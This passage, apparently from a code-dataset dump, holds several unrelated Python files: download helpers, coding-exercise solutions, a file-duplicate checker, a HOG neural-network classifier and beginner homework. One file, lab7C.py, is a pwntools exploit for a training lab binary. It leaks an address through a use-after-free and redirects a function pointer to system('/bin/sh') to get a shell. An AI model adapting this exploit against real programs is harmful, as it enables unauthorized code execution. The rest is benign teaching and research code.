        return line + u' ' + u'%3d' % int(current) + u'%\r'

    def reporthook(self, blocknum, bs, size):
        """urllib-style download hook: redraw the bar for the bytes so far."""
        pct = (blocknum * bs * 100) / size
        if pct > 100:
            pct = 100
        self._out.write(self.update_line(pct))
        self._out.flush()

    def finish(self):
        """Draw the bar at 100%."""
        self._out.write(self.update_line(100))
        self._out.flush()
class HEADRequest(urllib2.Request):
    # urllib2.Request issues GET by default; overriding get_method makes the
    # request an HTTP HEAD instead (Python 2 urllib2 API).
    def get_method(self):
        return "HEAD"
class Downloader(object):
    """Download helpers built on Python 2's urllib/urllib2.

    All network failures (IOError) are converted into DownloadError so
    callers handle a single exception type.
    """
    @classmethod
    def read(cls, url):
        # Fetch `url` and return the response body as a string.
        try:
            r = urllib.urlopen(url)
        except IOError:
            raise DownloadError('Failed to fetch %s' % url)
        else:
            return r.read()
    @classmethod
    def read_head_info(cls, url):
        # Issue an HTTP HEAD request and return the response headers;
        # any non-200 status is treated as a failure.
        try:
            req = HEADRequest(url)
            res = urllib2.urlopen(req)
        except IOError:
            raise DownloadError('Failed to fetch %s' % url)
        else:
            if res.code != 200:
                raise DownloadError('Failed to fetch %s' % url)
            return res.info()
    @classmethod
    def fetch(cls, url, filename):
        # Download `url` to `filename`, drawing a ProgressBar on stdout.
        b = ProgressBar()
        try:
            urllib.urlretrieve(url, filename, b.reporthook)
            sys.stdout.write('\n')
        except IOError:
            sys.stdout.write('\n')
            raise DownloadError('Failed to fetch %s from %s' % (filename, url))
| true |
1dedbe1ea9d944f68f71d2a8a6e06d6774028025 | Python | Aasthaengg/IBMdataset | /Python_codes/p03162/s104439235.py | UTF-8 | 427 | 2.796875 | 3 | [] | no_license | n = int(input())
# Dynamic programming over n days with three activities (a, b, c) per day;
# the same activity may not be chosen on two consecutive days.
A, B, C = [], [], []
for i in range(n):
    a, b, c = map(int, input().split())
    A.append(a)
    B.append(b)
    C.append(c)
# dp_x[i] = best total through day i when activity x is done on day i.
dp_a, dp_b, dp_c = [0] * n, [0] * n, [0] * n
dp_a[0] = A[0]
dp_b[0] = B[0]
dp_c[0] = C[0]
for i in range(1, n):
    # Each day's best extends the better of the other two activities' bests.
    dp_a[i] = max(dp_b[i-1], dp_c[i-1]) + A[i]
    dp_b[i] = max(dp_c[i-1], dp_a[i-1]) + B[i]
    dp_c[i] = max(dp_a[i-1], dp_b[i-1]) + C[i]
print(max(dp_a[-1], dp_b[-1], dp_c[-1]))
eebc418d2ed8d3ed1cb30ff00008e19e421efccf | Python | Ponkiruthika112/codekataset1 | /print_bef_0.py | UTF-8 | 301 | 2.71875 | 3 | [] | no_license | n=int(input())
# Concatenate the input digits into one string, then print the digit run
# that precedes each '0' (consecutive zeros are skipped), space-separated.
l=list(map(int,input().split()))
s=""
for i in range(0,len(l)):
    s=s+str(l[i])
k=""
i=0
# p tracks the index of the last '0' handled (-1 before the first one).
p=-1
while i<len(s):
    # NOTE(review): at i == 0 the test reads s[-1] (the last character) due
    # to Python's negative indexing — confirm a leading '0' is handled as
    # intended.
    if s[i]=="0" and s[i-1]=="0":
        i=i+1
    elif s[i]=="0":
        # Emit everything between the previous zero and this one.
        k=k+s[p+1:i]+" "
        p=i
        i=i+1
    else:
        i=i+1
print(k.strip())
#fjk
| true |
9557732bd2074692bb5987acc3cd6e76f0d0a913 | Python | naturofix/clear_data | /check_4_duplites.py | UTF-8 | 6,936 | 2.671875 | 3 | [] | no_license | # the purpose of this script is to check to file location and make sure files exist in both.
# if not file should be copied to to a temp folder in the second location
import os
import sys
import fnmatch
import time
import datetime
import filecmp
# Command-line arguments: tree to scan and destination for missing copies.
path_1 = sys.argv[1]
path_2 = sys.argv[2]
# Reference tree that is searched for duplicate copies of each *.raw file.
path_3 = '/mnt/BLACKBURNLAB/'
# Section toggles: `raw` runs the *.raw duplicate check, `other` copies QE files.
raw = True
other = True
def new_dir(test_path):
    # Create test_path via a shell `mkdir` if it does not already exist.
    # NOTE(review): Python 2 print statement; the path is not shell-quoted,
    # so paths containing spaces or shell metacharacters will break.
    if not os.path.isdir(test_path):
        cmd = 'mkdir %s' %(test_path)
        print cmd
        os.system(cmd)
# test = False
# try :
# test = sys.argv[3]
# except:
# print('python check_4_duplicates.py <path_1> <path_2> test : test will prevent deleting files')
# raw_input('enter to run script, all raw file not duplicated on both paths, will be copied to path_2')
# test = False
if raw == True:
    # --- Section 1: find *.raw files under path_1 with no byte-identical copy
    # --- under path_3, and copy them into <path_2>/missing_files/.
    raw_input('\n\nenter to run script, all raw file not duplicated on both paths, will be copied to %s/missing_files \n\n' %(path_2))
    missing_file_list = []
    cmd = 'mkdir missing_files'
    os.system(cmd)
    write_file = open('missing_files/%s_duplications.txt' %(path_1.replace('/','_')),'a')
    file_list = ['*.raw']
    print file_list
    raw_1 = []
    file_name_list_1 = []
    print('running search %s' %(path_1))
    # Recursively collect every *.raw file under path_1.
    for file_name in file_list:
        print file_name
        for root, dirnames, filenames in os.walk(path_1):
            for filename in fnmatch.filter(filenames, file_name):
                raw_1.append(os.path.join(root, filename))
                file_name_list_1.append(filename)
                #print filename
    print('search 1 done')
    print(len(raw_1))
    print(len(set(file_name_list_1)))
    write_file.write('%s : %s\n\n' %(path_1,len(raw_1)))
    raw_2 = []
    file_name_list_2 = []
    print('running search %s' %path_3)
    # Recursively collect every *.raw file under the reference tree path_3.
    for file_name in file_list:
        print file_name
        for root, dirnames, filenames in os.walk(path_3):
            for filename in fnmatch.filter(filenames, file_name):
                raw_2.append(os.path.join(root, filename))
                file_name_list_2.append(filename)
                #print filename
    print('search 2 done')
    print(len(raw_2))
    print(len(set(file_name_list_2)))
    # For each distinct base name, compare every path_1 copy against every
    # same-named path_3 copy with filecmp.
    for entry in list(set(file_name_list_1)):
        print '\n\n'
        print entry
        #index_1 = file_name_list_1.index(entry)
        index_1 = [i for i, x in enumerate(file_name_list_1) if x == entry]
        print index_1
        #index_2 = file_name_list_2.index(entry)
        index_2 = [i for i, x in enumerate(file_name_list_2) if x == entry]
        print index_2
        for i in index_1:
            file_1 = raw_1[i]
            hit = 0
            dup_list = []
            print file_1
            for j in index_2:
                file_2 = raw_2[j]
                print file_2
                print filecmp.cmp(file_1,file_2)
                if filecmp.cmp(file_1,file_2) == True:
                    hit += 1
                    dup_list.append(file_2)
            if hit == 0:
                # No identical copy exists: recreate the source's directory
                # structure under <path_2>/missing_files/ and shell-copy it.
                # NOTE(review): `file_list` is reused here for path components,
                # clobbering the earlier pattern list — confirm intentional.
                missing_file_list.append(file_1+'\n')
                new_path = '%s/missing_files/' %(path_2)
                new_dir(new_path)
                file_list = file_1.split('/')
                #print file_list
                path_list = file_list[4:len(file_list)-1]
                for path_entry in path_list:
                    new_path = '%s/%s' %(new_path,path_entry)
                    new_dir(new_path)
                output_path = new_path
                cmd = 'cp %s %s/%s' %(file_1,output_path,entry)
                print cmd
                os.system(cmd)
            if hit > 1:
                # More than one identical copy found: log the duplication.
                write_file.write('\n%s : %s copies in %s\n' %(file_1,hit,path_2))
                for dup in dup_list:
                    write_file.write('\t\t%s\n' %(dup))
            write_file.flush()
            #raw_input()
    write_file.close()
    print missing_file_list
    write_file = open('missing_files/%s_missing.txt' %(path_1.replace('/','_')),'a')
    write_file.writelines(missing_file_list)
    write_file.close()
if other == True:
    # --- Section 2: copy configuration/document files (by extension) from
    # --- path_1 into <path_2>/QE_files/, preserving directory structure.
    print '\n\nsearching for QE configuration files\n\n'
    file_extension_list = ['xlsx', 'pptx', 'docx', 'db', 'sld', 'pdf','meth','csv',]
    file_list_ext = []
    for file_name in file_extension_list:
        print file_name
        for root, dirnames, filenames in os.walk(path_1):
            for filename in fnmatch.filter(filenames, '*.%s' %file_name):
                file_list_ext.append(os.path.join(root, filename))
                #print filename
    for file_path in file_list_ext:
        #missing_file_list.append(file_1+'\n')
        #print 'missing file %s' %file_1
        # Rebuild the source path (components beyond index 4) under QE_files/.
        new_path = '%s/QE_files/' %(path_2)
        new_dir(new_path)
        file_list = file_path.split('/')
        path_list = file_list[4:len(file_list)-1]
        for path_entry in path_list:
            new_path = '%s/%s' %(new_path,path_entry)
            new_dir(new_path)
        output_path = new_path
        cmd = 'cp %s %s/%s' %(file_path,output_path,file_list[-1])
        print cmd
        os.system(cmd)
# for i in range(0,len(file_name_list)):
# file_name = file_name_list[i]
# file_path = refs[i]
# #print file_path
# #print file_name
# number = file_name_list.count(file_name)
# #li = file_name_list.index(file_name)
# #print li
# #print refs[li]
# #print number
# if number > 1:
# print file_name
# print number
# indices = [i for i, x in enumerate(file_name_list) if x == file_name]
# dups = [refs[j] for j in indices]
# times = []
# for dup_file_path in dups:
# if os.path.exists(dup_file_path):
# times.append(os.path.getmtime(dup_file_path))
# #print dups
# #print times
# min_index = times.index(min(times))
# #print min_index
# #print times[min_index]
# first_file = dups[min_index]
# if os.path.exists(first_file) and os.path.exists(file_path):
# if 'History' not in file_path:
# if file_path != first_file:
# print "\n"
# print first_file
# print file_path
# if filecmp.cmp(first_file,file_path):
# print 'same file'
# cmd = 'mv %s %s' %(file_path,rep_path)
# print cmd
# reps_count += 1
# if test == False:
# os.system(cmd)
# print 'moved'
# mv_file_list.append(file_path)
# else:
# print 'not the same'
# diffs += 1
# else:
# print 'first file'
# else:
# print 'in history'
# hist += 1
# else:
# missing_file_list = []
# if not os.path.exists(file_path):
# missing_file_list.append(file_path)
# if not os.path.exists(first_file):
# missing_file_list.append(first_file)
# for missing_file in missing_file_list:
# print '\n\n\n##################### Error ###################\n\n\n'
# if file_path in mv_file_list:
# print 'file already moved, which is rather strange'
# else:
# print 'file not in moved list'
# print '%s no longer exists' %file_path
# print '\n\n\n##################### Error ###################\n\n\n'
# raw_input('enter to continue')
# print 'total : %s' %total
# print i
# print 'reps : %s (%s%s)' %(reps_count,round(float(reps_count)/float(i),3)*100,'%')
# print 'same name different file = %s' %(diffs)
# print 'in history : %s' %(hist)
# print 'total : %s' %total
# print 'reps : %s (%s%s)' %(reps_count,round(float(reps_count)/float(i),3)*100,'%')
# print 'same name different file = %s' %(diffs)
# print 'in history : %s' %(hist)
# for file_path in refs
# if os.path.exists(file_path):
# cmd = 'mv %s %s' %(file_path.replace(' ','\ '),wash_month)
# print cmd
# if test == False:
# os.system(cmd)
# print 'executed'
# #raw_input()
| true |
56990b805ddabefdb25f6f304a6e1f319011e8c7 | Python | jonahobw/honors | /image_features_network.py | UTF-8 | 15,208 | 2.609375 | 3 | [] | no_license | import copy
import torch.nn.functional as F
import torch
import os
import pandas as pd
from sklearn.model_selection import train_test_split
from torch import nn
import torch.optim as optim
from torch.utils.data import Dataset
from sklearn.preprocessing import StandardScaler
import time
import matplotlib.pyplot as plt
from general import str_date
from image_features import gather_image_features, load_hog_df
import numpy as np
# input size is the length of the feature vector, see gather_image_features in image_features.py
from tree_helper import split_all
# Network/hyper-parameter defaults.  INPUT_SIZE is overwritten (to 80) by
# create_train_save_hog_model, and NUM_CLASSES is overwritten by hog_dataset
# with the number of distinct shape labels found in the csv.
INPUT_SIZE = 22
HIDDEN_LAYER_SIZE = 200
NUM_CLASSES = 43
EPOCHS = 5
LEARNING_RATE = 0.01
class hog_dataset(Dataset):
    # adapted from https://medium.com/@shashikachamod4u/excel-csv-to-pytorch-dataset-def496b6bcc1
    """Torch Dataset over a HOG-features csv.

    Column 1 of the csv holds the GTSRB class id; columns 2:82 hold the 80
    HOG feature values.  Class ids are translated into shape labels via
    tree_helper.split_all("shape"), and the module-level NUM_CLASSES is
    updated to the number of distinct shapes actually present.
    """
    def __init__(self, filename):
        global NUM_CLASSES
        # read csv and load data
        # specific to hog -----------------------------------
        df = pd.read_csv(filename)
        x = df.iloc[0:len(df.index), 2:82].values
        y = df.iloc[0:len(df.index), 1].values
        # x = df.iloc[0:256, 2:82].values
        # y = df.iloc[0:256, 1].values
        # array where each index represents a class, and the value at that index represents the attribute label for that
        # class
        class_attributes = split_all("shape")
        y = [class_attributes[i] for i in y]
        mapping = {"circle": 0, "triangle": 1, "diamond": 2, "inverted_triangle" : 3, "octagon" : 4}
        y = [mapping[i] for i in y]
        num_unique_classes = len(list(set(y)))
        NUM_CLASSES = num_unique_classes
        # Feature Scaling
        sc = StandardScaler()
        x_train = sc.fit_transform(x)
        y_train = y
        # converting to torch tensors
        self.X_train = torch.tensor(x_train, dtype=torch.float32)
        self.y_train = torch.tensor(y_train)
    def __len__(self):
        # Number of samples (rows) in the dataset.
        return int(len(self.y_train))
    def __getitem__(self, item):
        # Return the (features, shape-label) pair for one row.
        return self.X_train[item], self.y_train[item]
class Net(nn.Module):
    # adapted from https://curiousily.com/posts/build-your-first-neural-network-with-pytorch/
    """Fully-connected classifier: INPUT_SIZE -> 3 hidden ReLU layers of
    HIDDEN_LAYER_SIZE -> NUM_CLASSES.  Weights drawn uniformly from [-1, 1].
    """
    def __init__(self):
        super(Net, self).__init__()
        # Bug fix: the original re-initialized self.fc1.weight four times and
        # left fc2-fc4 at their default init; each layer now gets its own
        # uniform initialization.
        self.fc1 = nn.Linear(INPUT_SIZE, HIDDEN_LAYER_SIZE)
        nn.init.uniform_(self.fc1.weight, -1.0, 1.0)
        self.fc2 = nn.Linear(HIDDEN_LAYER_SIZE, HIDDEN_LAYER_SIZE)
        nn.init.uniform_(self.fc2.weight, -1.0, 1.0)
        self.fc3 = nn.Linear(HIDDEN_LAYER_SIZE, HIDDEN_LAYER_SIZE)
        nn.init.uniform_(self.fc3.weight, -1.0, 1.0)
        self.fc4 = nn.Linear(HIDDEN_LAYER_SIZE, NUM_CLASSES)
        nn.init.uniform_(self.fc4.weight, -1.0, 1.0)

    def forward(self, x):
        # Three hidden ReLU layers; the output also passes through ReLU (kept
        # from the original).  NOTE(review): ReLU on the logits zeroes all
        # negative class scores before CrossEntropyLoss — confirm intended.
        x = F.relu(self.fc1(x))
        x = F.relu(self.fc2(x))
        x = F.relu(self.fc3(x))
        return F.relu(self.fc4(x))
def train(csv_file, epochs = EPOCHS, lr = LEARNING_RATE):
    #adapted from https://curiousily.com/posts/build-your-first-neural-network-with-pytorch/
    """Train a Net on the color-feature csv; full-batch gradient descent.

    Returns (model, train_acc_history, val_acc_history, train_loss_history,
    val_loss_history).  NOTE(review): `lr` is halved inside the loop but the
    optimizer is never rebuilt, so the change has no effect — and the guard
    tests `epochs % 100`, not `epoch % 100`; confirm intent.
    """
    df = pd.read_csv(csv_file)
    X = df[['max_color_len', 'max_color_r', 'max_color_g', 'max_color_b', 'r_avg', 'g_avg', 'b_avg',
            'dom_color1_r', 'dom_color1_g', 'dom_color1_b', 'dom_color2_r', 'dom_color2_g', 'dom_color2_b',
            'dom_color3_r', 'dom_color3_g', 'dom_color3_b', 'dom_color4_r', 'dom_color4_g', 'dom_color4_b',
            'dom_color5_r', 'dom_color5_g', 'dom_color5_b']]
    y = df[['img_class']]
    # split data into 20% validation and 80% training
    X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.2)
    # 2d tensor
    X_train = torch.from_numpy(X_train.to_numpy()).float()
    # 1d tensor
    y_train = torch.squeeze(torch.from_numpy(y_train.to_numpy()))
    # 2d tensor
    X_val = torch.from_numpy(X_val.to_numpy()).float()
    # 1d tensor
    y_val = torch.squeeze(torch.from_numpy(y_val.to_numpy()))
    since = time.time()
    val_loss_history = []
    val_acc_history = []
    training_loss_history = []
    training_acc_history = []
    model = Net()
    criterion = nn.CrossEntropyLoss()
    #optimizer = optim.SGD(model.parameters(), lr)#, momentum=0.9)
    optimizer = optim.Adam(model.parameters(), lr=lr)
    device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    X_train = X_train.to(device)
    y_train = y_train.to(device)
    X_val = X_val.to(device)
    y_val = y_val.to(device)
    model = model.to(device)
    criterion = criterion.to(device)
    for epoch in range(epochs):
        # divide learning rate in half every 25 epochs
        if(epochs % 100 == 0 and epoch != 0):
            lr = lr/2
        #----------training data----------
        model.train()
        optimizer.zero_grad()
        with torch.set_grad_enabled(True):
            # run training data through the model and get predictions
            y_pred = model(X_train)
            y_pred = torch.squeeze(y_pred)
            # calculate training loss and add it to the history, do the same with training accuracy
            train_loss = criterion(y_pred, y_train)
            training_loss_history.append(train_loss)
            train_acc = calculate_accuracy(y_train, y_pred)
            training_acc_history.append(train_acc)
            # update model based on training data
            train_loss.backward()
            optimizer.step()
        #----------validation data----------
        model.eval()
        optimizer.zero_grad()
        with torch.set_grad_enabled(False):
            # run validation data through the model and get predictions
            y_val_pred = model(X_val)
            y_val_pred = torch.squeeze(y_val_pred)
            # calculate validation loss and add it to the history, do the same with validation accuracy
            val_loss = criterion(y_val_pred, y_val)
            val_loss_history.append(val_loss)
            val_acc = calculate_accuracy(y_val, y_val_pred)
            val_acc_history.append(val_acc)
        print("epoch {}\nTrain set - loss: {:.4f}, accuracy: {:.4f}%\nVal set - loss: {:.4f}, accuracy: {:.4f}%\n"
              .format(str(epoch), train_loss.item(), train_acc.item()*100, val_loss.item(), val_acc.item()*100))
    time_elapsed = time.time() - since
    print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))
    return model, training_acc_history, val_acc_history, training_loss_history, val_loss_history
def calculate_accuracy(y_true, y_pred):
    """Return the fraction of correct predictions as a float tensor.

    y_true: 1d tensor of ground-truth class indices.
    y_pred: 2d tensor (sample x class scores); argmax over dim 1 gives each
    sample's predicted class.
    (Fix: leftover debug prints of the first 10 predictions were removed.)
    """
    predicted = torch.max(y_pred, dim=1)[1]
    correct = predicted == y_true
    return correct.sum().float() / len(y_true)
def save_model(model, fname = None):
    """Serialize *model* to *fname* with torch.save and return the path used.

    Bug fix: when fname was None the original computed a default `path` but
    then still called torch.save(model, None) (crashing on os.path.join with
    None first); the default path is now actually used.
    """
    if fname is None:
        fname = os.path.join(os.getcwd(), "Image_features", "model")
    torch.save(model, fname)
    print('Model saved as {}'.format(fname))
    return fname
def load_model(filename = None):
    """Load a whole pickled model from *filename* and return it in eval mode.

    Fixes: map_location lets checkpoints saved on GPU load on CPU-only
    machines; weights_only=False is required on torch>=2.6 (where the default
    flipped) because these checkpoints store a full nn.Module rather than a
    state dict — only load trusted files.
    """
    device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    model = torch.load(filename, map_location=device, weights_only=False)
    model.to(device)
    model.eval()
    return model
def create_train_save_print_model(csv):
    """Train a Net on *csv*, then print its output for one sample test image.

    The model is run on the color features of Test/00/00243.png; the
    save/plot calls are left commented out from earlier experiments.
    """
    model, training_acc, test_acc, training_loss, test_loss = train(csv)
    model.eval()
    image = os.path.join(os.getcwd(), 'Test', '00', '00243.png')
    features = gather_image_features(image)
    features = torch.from_numpy(np.array(features)).float()
    output = model(features)
    print(output)
    #save_model(model)
    #plot_accuracy_and_loss(training_acc, training_loss, test_acc, test_loss)
def plot_accuracy_and_loss(train_acc, train_loss, test_acc, test_loss):
    # plots the training and validation accuracy and loss during training,
    # saving the figures under ML/Outputs/.
    # Bug fix: plt.savefig() must run BEFORE plt.show() — show() finalizes
    # and clears the current figure, so the original saved blank images.
    # plotting graphs for accuracy
    plt.figure(0)
    plt.plot(train_acc, label='training accuracy')
    plt.plot(test_acc, label='val accuracy')
    plt.title('Accuracy')
    plt.xlabel('epochs')
    plt.ylabel('accuracy')
    plt.legend()
    path = os.path.join(os.getcwd(), "ML", "Outputs", "accuracy.png")
    plt.savefig(path)
    plt.show()
    plt.figure(1)
    plt.plot(train_loss, label='training loss')
    plt.plot(test_loss, label='val loss')
    plt.title('Loss')
    plt.xlabel('epochs')
    plt.ylabel('loss')
    plt.legend()
    path = os.path.join(os.getcwd(), "ML", "Outputs", "loss.png")
    plt.savefig(path)
    plt.show()
def train_hog_model(model, dataloader, lr = LEARNING_RATE, epochs = EPOCHS):
    """Train *model* on batches from *dataloader* with SGD + momentum.

    Tracks per-epoch loss/accuracy, keeps a deep copy of the best-accuracy
    weights, restores them at the end, and returns
    (model, training_acc_history, training_loss_history).
    """
    criterion = nn.CrossEntropyLoss()
    device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    if torch.cuda.is_available():
        model.cuda()
    model.train()
    optimizer = optim.SGD(model.parameters(), lr, momentum=0.9)
    since = time.time()
    num_samples = len(dataloader.dataset)
    #print("Number of samples in the dataset:\t{}".format(num_samples))
    training_loss_history = []
    training_acc_history = []
    best_model_wts = copy.deepcopy(model.state_dict())
    best_acc = 0.0
    for i in range(epochs):
        print('Epoch {}/{}'.format(i + 1, epochs))
        print('-' * 10)
        running_loss = 0
        running_corrects = 0
        count = 0
        for features, labels in dataloader:
            count += 1
            if (count % 100 == 0):
                print("Completed batch " + str(count))
            # forward pass
            output = model(features)
            loss = criterion(output, labels)
            _, preds = torch.max(output, 1)
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
            # Accumulate per-batch loss and correct-prediction counts.
            running_loss +=loss.item()
            running_corrects += int(torch.sum(preds == labels.data))
        epoch_loss = running_loss / num_samples
        epoch_acc = running_corrects / num_samples
        print('\tLoss: {:.4f} Acc: {:.4f}'.format(epoch_loss, epoch_acc))
        training_acc_history.append(epoch_acc)
        training_loss_history.append(epoch_loss)
        # Snapshot the weights whenever this epoch beats the best accuracy.
        if epoch_acc > best_acc:
            best_acc = epoch_acc
            best_model_wts = copy.deepcopy(model.state_dict())
    time_elapsed = time.time() - since
    print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))
    print('Best Acc: {:4f}'.format(best_acc))
    # load best model weights
    model.load_state_dict(best_model_wts)
    return model, training_acc_history, training_loss_history
def hog_predict_shape(model, dataset, original_csv, save_filename = None):
    # takes a csv file from <root_folder> (one that has the cluster predictions) and takes
    # information collected from a shapes_in_clusters csv to predict the shape of an image.  Creates a new
    # csv called shape_predictions where the columns are
    # img path, img class, img shape, shape prediction (string)
    # dataset is a hog_dataset instance
    # Per-shape and overall accuracy are printed at the end.
    model.eval()
    if save_filename is None:
        save_filename = "nn_shape_predictions.csv"
    original_csv_df = load_hog_df(original_csv)
    root_folder = os.path.split(original_csv)[0]
    save_path = os.path.join(root_folder, save_filename)
    f = open(save_path, 'w+')
    f.write("img,class,model_predicted_shape,true_shape,correct")
    # array where each index represents a class, and the value at that index represents the attribute label for that
    # class
    class_attributes = split_all("shape")
    mapping = {"circle": 0, "triangle": 1, "diamond": 2, "inverted_triangle": 3, "octagon": 4}
    inv_mapping = {v: k for k, v in mapping.items()}
    total_correct = 0
    shapes_correct = {"circle": 0, "triangle": 0, "diamond": 0, "inverted_triangle": 0, "octagon": 0}
    shapes_count = {"circle": 0, "triangle": 0, "diamond": 0, "inverted_triangle": 0, "octagon": 0}
    num_rows = len(dataset)
    for i in range(num_rows):
        correct = 0
        # get a row of hog data
        data, label = dataset.__getitem__(i)
        label = int(label.item())
        # get model prediction
        pred = list(model(data))
        pred_shape = pred.index(max(pred))
        # get img file name and img class
        data = original_csv_df.iloc[[i], [0,1]]
        data = list(data.iloc[0])
        img_name = data[0]
        true_class = data[1]
        true_shape = class_attributes[true_class]
        # Sanity check: the dataset's label must match the csv-derived shape.
        if mapping[true_shape] != label:
            print("Error, true class is not equal to the label")
            exit(-1)
        shapes_count[true_shape] +=1
        if pred_shape == mapping[true_shape]:  # correct prediction?
            total_correct +=1
            shapes_correct[true_shape] += 1
            correct = 1
        f.write("\n{},{},{},{},{}".format(img_name, true_class, inv_mapping[pred_shape], true_shape, correct))
    f.close()
    print("total correct:\t\t{}/{}, {:4f}%".format(total_correct, num_rows, 100 * total_correct/num_rows))
    for key in shapes_count:
        print("{}:\t\t{}/{} correct, {:4f}%".format(key, shapes_correct[key],shapes_count[key],
                                                    100 * shapes_correct[key]/shapes_count[key]))
def create_train_save_hog_model(filename = None, evaluate = True, save = True):
    """Build a hog_dataset, train a Net on it, optionally evaluate and save.

    Forces the module-level INPUT_SIZE to 80 (the HOG feature width) before
    constructing the network.
    """
    global INPUT_SIZE
    INPUT_SIZE = 80
    if filename is None:
        filename = os.path.join(os.getcwd(), "Image_features", "HOG", "80hog_img_features_GTSRB_ResNet_2021-03-11",
                                "80hog_img_features_GTSRB_ResNet_2021-03-11.csv")
    hog_data = hog_dataset(filename)
    print("Number of samples in the dataset:\t{}".format(len(hog_data)))
    train_loader = torch.utils.data.DataLoader(hog_data, batch_size=64, shuffle=True)
    model = Net()
    model, train_acc, train_loss = train_hog_model(model, train_loader)
    if evaluate:
        hog_predict_shape(model, hog_data, original_csv=filename)
    if save:
        # Saved next to the csv, name-prefixed with today's date.
        fname = os.path.join(os.path.split(filename)[0], str_date() + "hog_model")
        save_model(model, fname)
def load_evaluate_hog(filename = None, test_data = False):
    """Load a saved HOG model and evaluate shape prediction on a csv.

    test_data=True evaluates on the held-out Test csv instead of training data.
    """
    if filename is None:
        filename = os.path.join(os.getcwd(), "Image_features", "HOG",
                                "80hog_img_features_GTSRB_ResNet_2021-03-11", "2021-04-01hog_model")
    model = load_model(filename)
    csv = os.path.join(os.getcwd(), "Image_features", "HOG", "80hog_img_features_GTSRB_ResNet_2021-03-11",
                       "80hog_img_features_GTSRB_ResNet_2021-03-11.csv")
    if test_data:
        csv = os.path.join(os.getcwd(), "Image_features", "HOG", "80hog_img_features_Test_2021-03-22",
                           "80hog_img_features_Test_2021-03-22.csv")
    hog_data = hog_dataset(csv)
    hog_predict_shape(model, hog_data, original_csv=csv)
if __name__ == '__main__':
    # Current entry point: evaluate the saved HOG model on the test csv.
    # The commented lines are earlier experiments kept for reference.
    #csv = os.path.join(os.getcwd(), "Image_features", "img_features_GTSRB_ResNet_2020-12-29_normalized.csv")
    #csv = os.path.join(os.getcwd(), "Image_features", "img_features_small_test_dataset_2020-12-29.csv")
    #train(csv)
    #create_train_save_print_model(csv)
    load_evaluate_hog(test_data=True)
    #create_train_save_hog_model(evaluate=False, save=False)
52e37cecef8f581ae567ea6011fe1b99bc2fa120 | Python | Swapna-Sahu/python-and-data-science-tools | /week1/HomeworkWeek1.py | UTF-8 | 2,316 | 4.65625 | 5 | [] | no_license | # Task 1 - Write a python script to print your name and age
# Week 1 homework: ten small, independent console exercises (Task 1 starts here).
name = input("Enter your name")
age = int(input("Enter your age"))
print(f"Your name is : {name}. Your age is : {age}")
# Task 2 - Create a list of your 5 favorite movies and store it in the variable
movies = []
for i in range(5):
    movie = input(" Enter your favorite movies")
    movies.append(movie)
print("Your 5 Fav movies are : ", movies)
# Task 3 - Write a Python program to display the first and last colors from the following list.
color_list = ["Red", "Green", "White", "Black"]
print(color_list[0], color_list[-1])
# Task 4 - Write a Python script to add a key to a dictionary
numbers = {0: 10, 1: 20}
numbers[2] = 30
print(numbers)
# Task 5 - Write a Python program to calculate body mass index.
name = input("enter your name")
weight = float(input("enter your weight in kg"))
height = float(input("enter your height in meter"))
bmi = weight/height**2
print(name, "'s BMI is ", bmi)
# Task 6 - Guess a number game - between 1 to 9.
guess_number = 7
while True:
    user_guess = int(input("Enter your guess number"))
    if user_guess == guess_number:
        print("Well guessed!")
        break
# Task 7 - Create a tuple with different data types
sample_tuple = ("hello world", 134, True, 40.4)
print(sample_tuple)
# Task 8 - Create a list of 5 city names and convert it into tuples.
city = ["Delhi", "Mumbai", "Kolkata", "Chennai", "Copenhagen"]
print("Type of city variable : ", type(city))
city_tuple = tuple(city)
print("Type of city_tuple variable : ", type(city_tuple))
print("City Tuple : ", city_tuple)
# Task 9 - Remove duplicated from the list
sample_list = [10, 20, 30, 20, 10, 50, 60, 40, 80, 50, 40]
sample_list = list(dict.fromkeys(sample_list))  # dict.fromkeys keeps first-seen order
print(sample_list)
example_list = [10, 20, 30, 20, 10, 50, 60, 40, 80, 50, 40]
example_list = list(set(example_list))  # set() deduplicates but does not preserve order
print(example_list)
# Task 10 - Accept a string from user and remove the characters which have odd index values of a given string and print them.
str1 = input("Please Enter your Own String : ")
str2 = ''
# for i in range(len(str1)):
#     if (i % 2 == 0):
#         str2 += str1[i]
for i, sample_char in enumerate(str1):
    if i % 2 == 0:
        str2 += sample_char
print("Original String : ", str1)
print("Final String : ", str2)
| true |
b464ea2e3b50573dc561417a5852b727056a0046 | Python | zytMatrix/MBEsolutions | /lab7C.py | UTF-8 | 882 | 2.515625 | 3 | [] | no_license | from pwn import *
# Use-after-free exploit script (pwntools): a freed "num" slot is re-allocated
# as a string, the stale num index leaks a heap/libc address, and the slot is
# then rewritten so printing the "string" calls system with "/bin/sh".
SYSTEM_OFFSET = 0x19da37 # Offset from `system` to `small_str`
# Choices
MAKE_STR = "1"
MAKE_NUM = "2"
DEL_STR = "3"
DEL_NUM = "4"
PRINT_STR = "5"
PRINT_NUM = "6"
p = process(["/levels/lab07/lab7C"])
log.info(util.proc.pidof(p))
#pause()
# Fill the first num index with the first allocation pointer
p.sendline(MAKE_NUM)
p.sendline("1234")
# -- Delete it to free up the alloc
p.sendline(DEL_NUM)
# -- Realloc as a string
p.sendline(MAKE_STR)
p.sendline("/bin/sh")
# Read address of `short_str`
p.sendline(PRINT_NUM)
p.recv()
p.sendline("1")
# The leaked address is the last whitespace-separated token on the first line.
leak = p.recv().split("\n")[0].split()[-1]
leak = int(leak)
log.info("Leaked short_str: 0x{:x}".format(leak))
system_addr = leak - SYSTEM_OFFSET
# Delete string and realloc as num
p.sendline(DEL_STR)
p.sendline(MAKE_NUM)
p.sendline(str(system_addr))
# Call `system`
p.sendline(PRINT_STR)
p.sendline("1")
p.interactive()
| true |
8947b0311f983a830ad07df5ca8c687f1fd044e9 | Python | bingqingsuimeng/face_data_preprocess | /utils.py | UTF-8 | 3,333 | 3.234375 | 3 | [] | no_license | import os
import time
def mkdir(dir):
    """Create directory *dir*, ignoring the error if it already exists.

    Fixed: the original broad ``except OSError`` also silently swallowed
    real problems (permission denied, missing parent); only the expected
    ``FileExistsError`` is ignored now.
    """
    try:
